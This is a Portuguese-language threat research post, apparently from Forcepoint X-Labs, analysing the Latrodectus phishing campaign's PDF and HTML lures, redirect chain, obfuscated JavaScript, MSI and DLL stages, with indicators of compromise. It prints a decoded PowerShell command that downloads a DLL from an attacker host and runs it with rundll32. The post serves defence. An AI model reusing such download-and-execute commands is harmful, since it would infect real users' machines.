Ir para o conteúdo principal
|
0 minutos de leitura

Dentro da Campanha de Malware Latrodectus

Phishing tradicional encontra inovação na entrega de payloads

Get a Demo of Forcepoint Solutions

Este relatório oferece uma análise detalhada da recente atividade da campanha Latrodectus, descoberta pela nossa equipe de pesquisa do X-Labs. Uma das principais técnicas de disseminação do Latrodectus envolve e-mails de phishing, aproveitando infraestruturas como a do IcedID.

O Latrodectus tem como alvo principal os setores financeiros, automotivo e de saúde. Ao comprometer contas de e-mail e distribuir anexos maliciosos, ele se propaga por uma rede mais ampla de alvos potenciais.

Atualmente, os agentes de ameaça estão adotando cada vez mais o Latrodectus, utilizando formatos de anexo prevalentes, como HTML e PDF. Ele é projetado para ser furtivo e persistente, complicando os esforços de detecção e erradicação. Isso pode levar à exfiltração de dados pessoais, perdas financeiras devido a fraudes ou extorsão, e ao comprometimento de informações sensíveis.

A campanha Latrodectus inicia-se com ataques originados de um e-mail comprometido que aparenta conter documentos críticos do DocuSign. Os usuários são incentivados a acessar o documento por meio do link fornecido. Quando o link é clicado, os usuários são redirecionados para uma URL maliciosa, resultando no download inadvertido do payload da próxima etapa.

Fig. 1 - Cadeia de Ataque

Fig. 2 - Acesso Inicial ao PDF

Fig. 3 - URL suspeita incorporada em PDF

O PDF contém domínio comprometido com redirecionamento:
“hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”

Ele redireciona para URLs encurtadas e, em seguida, para outro domínio suspeito:

 “hxxps://digitalpinnaclepub[.]com/?3” e, finalmente, redireciona para o projeto do “storage.googleapis.com”“hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”

Análise do JavaScript Ofuscado

  • O JavaScript contém muitas mensagens lixo em “//”, o que aumenta a ofuscação e o tamanho do arquivo. O código JavaScript malicioso real está comentado em “////”.

Fig. 4 - Carga útil de JavaScript ofuscada

  • Após remover as mensagens lixo, é exibida a manipulação de strings ofuscadas do JavaScript com funções de substituição e junção. Substituindo “////” por um espaço (“ ”), o código malicioso real é revelado.

Fig. 5 - Funções de manipulação de strings Javascript desofuscadas

  • Após a desofuscação, ele cria ActiveXObject("WindowsInstaller.Installer") e baixa um arquivo instalador .msi. Veja a Fig. 6 abaixo:

 Fig. 6  - Código Javascript desofuscado baixa arquivo MSI

 

Análise do MSI

  • O arquivo MSI é executado via JavaScript e faz o drop de um arquivo malicioso .dll de 64 bits na pasta %appdata%.

Fig. 7 - Arquivo MSI

  • O .dll dropado contém a função de exportação “GetDeepDVCState”, e o MSI executa este .dll com o parâmetro: “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState”

 

Análise do DLL

  • O DLL é um binário Microsoft Visual C++ de 64 bits com informações falsas de versão da NVIDIA.

Fig. 8 - Informações da versão DLL

  • Este DLL desempacota outro payload DLL de estágio na memória:

 Fig. 9 - Informações da versão DLL

O binário DLL desempacotado de 64 bits conecta-se a um servidor C2 malicioso em uma porta incomum, 8041.

Greshunka[.]com:8041/bazar.php

Acesso Inicial via HTML

A página HTML de phishing parece um pop-up de documento Word para o usuário. Clicar no botão executa código JavaScript malicioso incorporado no HTML. Veja a Fig. 10 abaixo:

Fig. 10  - Anexo HTML

Ela contém mensagens de aviso em pop-up em ordem invertida:

document.getElementById("prompt").innerHTML = ll('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');

Mensagem revertida:

Your browser does not support correct offline display of this document. Please follow the instructions below using the

O código também utiliza diferentes funções de codificação de strings, como window.atob(), e funções de ofuscação, como s.split("").reverse().join("");

Fig. 11 - Código Suspeito em HTML

Código Base64 Decodificado

cmd /c start /min powershell $path='%appdata%\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8==

Isso mostra que os agentes de ameaça tentam usar HTML para iniciar o PowerShell, baixar diretamente o payload DLL sem MSI e executá-lo com rundll32.exe, conectando-se ao C2. Observamos algumas campanhas com anexos HTML em e-mails comprometidos.

Conclusão

Os agentes de ameaça continuam a usar e-mails antigos para atacar usuários por meio de anexos suspeitos em PDF ou HTML. Eles utilizam um método de redirecionamento com encurtadores de URL e hospedam payloads maliciosos em projetos conhecidos do storage[.]googleapis[.]com. Posteriormente, baixam JavaScript ofuscado para fazer download do MSI e utilizam rundll32.exe para executar DLLs de 64 bits.

Esta campanha combina o antigo com o novo. O Latrodectus aproveita infraestruturas antigas combinadas com um método inovador de distribuição de payloads maliciosos para os setores financeiro, automotivo e de negócios.

Declaração de proteção

Os clientes da Forcepoint estão protegidos contra esta ameaça nos seguintes estágios de ataque:

  • Estágio 2 (Isca): Anexos PDF e HTML maliciosos associados a esses ataques são identificados e bloqueados.
  • Estágio 3 (Redirecionamento): URLs encurtadas de redirecionamento e domínios comprometidos são bloqueados.
  • Estágio 5 (Arquivo Dropper): Os arquivos dropper são adicionados ao banco de dados de malwares da Forcepoint e bloqueados.
  • Estágio 6 (Comunicação com C2): Credenciais C2 bloqueadas.

IOCs

URLs de Estágio Inicial:

  • hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
  • hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW
  • hxxps://digitalpinnaclepub[.]com/?3
  • hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js
  • hxxp://194[.]54[.]156[.]91/dsa.msi
  • hxxp://gertioma[.]top/o.jpg

C2s:

  • tiguanin[.]com
  • greshunka[.]com
  • bazarunet[.]com
  • mazinom[.]com
  • leroboy[.]com
  • krinzhodom[.]com
  • klemanzino[.]net
  • rilomenifis[.]com
  • isomicrotich[.]com

 

Hashes:

  • 35A990C3BE798108C9D12A47F4A028468EA6095B
  • 9361621490915EBB919B79C6101874F03E4E51BC
  • 71E99A21FFA29E1E391811F5A3D04DCBB9CF0949
  • 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
  • 62e23500cc5368e37be47371342784f72e481647
  • 881993bcb37aa9504249271b7559addc0c633f09
  • 7474873629399ee5fdd984c99b705e0490ab8707
  • mayur-sewani.jpg

    Mayur Sewani

    Mayur serves as a Senior Security Researcher as part of the Forcepoint X-Labs Research Team. He focuses on APT malwares, information stealers, phishing attacks, and also works to stay on top of the latest threats. He is passionate about advancing the field of defensive adversary emulation and research.

    Leia mais artigos de Mayur Sewani

    No Artigo

    X-Labs

    Get insight, analysis & news straight to your inbox

    Ao Ponto

    Cibersegurança

    Um podcast que cobre as últimas tendências e tópicos no mundo da cibersegurança

    Ouça Agora